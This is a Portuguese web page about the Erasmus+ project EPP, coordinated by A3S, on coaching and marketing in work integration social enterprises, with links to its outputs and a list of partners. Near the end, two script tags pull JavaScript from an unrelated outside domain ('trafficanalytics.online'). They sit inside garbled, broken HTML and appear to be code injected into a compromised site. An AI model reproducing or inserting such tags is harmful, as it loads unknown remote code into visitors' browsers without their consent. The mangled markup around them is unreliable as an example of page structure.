Fortalecer os Perfis Profissionais Emergentes no Terceiro Sector

O projecto Europeu EPP – ‘Fortalecer os perfis profissionais emergentes no terceiro sector – uma via para promover pontes inovadoras para o trabalho e inclusão social de grupos desfavorecidos’, teve início em 2014 e terminou em Outubro de 2016. Coordenada pela A3S, esta parceria estratégica, teve como principal enfoque os desafios actuais que se colocam aos recursos humanos das empresas sociais de inserção pelo trabalho (WISE em inglês),  privilegiando o papel das funções de coaching e marketing desempenhadas por estas organizações. As principais conclusões do projecto e a divulgação dos 4 produtos intelectuais elaborados foram apresentados no seminário final “Respostas Reais para o Emprego e a Inclusão. As Empresas Sociais de Inserção pelo Trabalho na Europa 2020“, em Setembro de 2016, no Porto.

 

O acesso aos documentos finais do projecto está disponível a partir dos seguintes links:

Sumário Executivo do Projecto

1. As funções de coaching e marketing nas WISE – estudo exploratório em 5 países europeus. Anexo do documento “Empresas de Inserção em 5 países europeus. Estudos de caso por país”
2. Pacote de formação “Coaching nas empresas de inserção”
3. Pacote de formação “Marketing nas empresas de inserção”
4. Documento estratégico para a da formação e qualificação de competências para os profissionais das empresas sociais de inserção pelo trabalho. Recomendações por região:

4.1 União Europeia

4.2 Áustria

4.3 Bélgica

4.4 Itália

4.5 Portugal

5. Acesso ao artigo produzido pelos parceiros ingleses Development in Work Integration Social Enterprises (WISEs)

6. A A3S é co-produtora do episódio especial dos Diários de Empreendedorismo Social dedicado às Empresas de Inserção, que conta com a participação dos nossos parceiros e da própria A3S.

Lisboa , <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> Calçada Portuguesa” width=”300″ height=”166″ /></a></p>
<p> </p>
<p><script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script><strong><div class=Coordenação do projecto A3S

Parceria

ARBEIT PLUS (Aústria)

ENSIE – European Network of Social Integration Enterprises (Bélgica)

SCF – ScuolaCentrale de Formazione (Itália)

Social Enterprise Europe (Reino Unido)

Financiamento ERASMUS+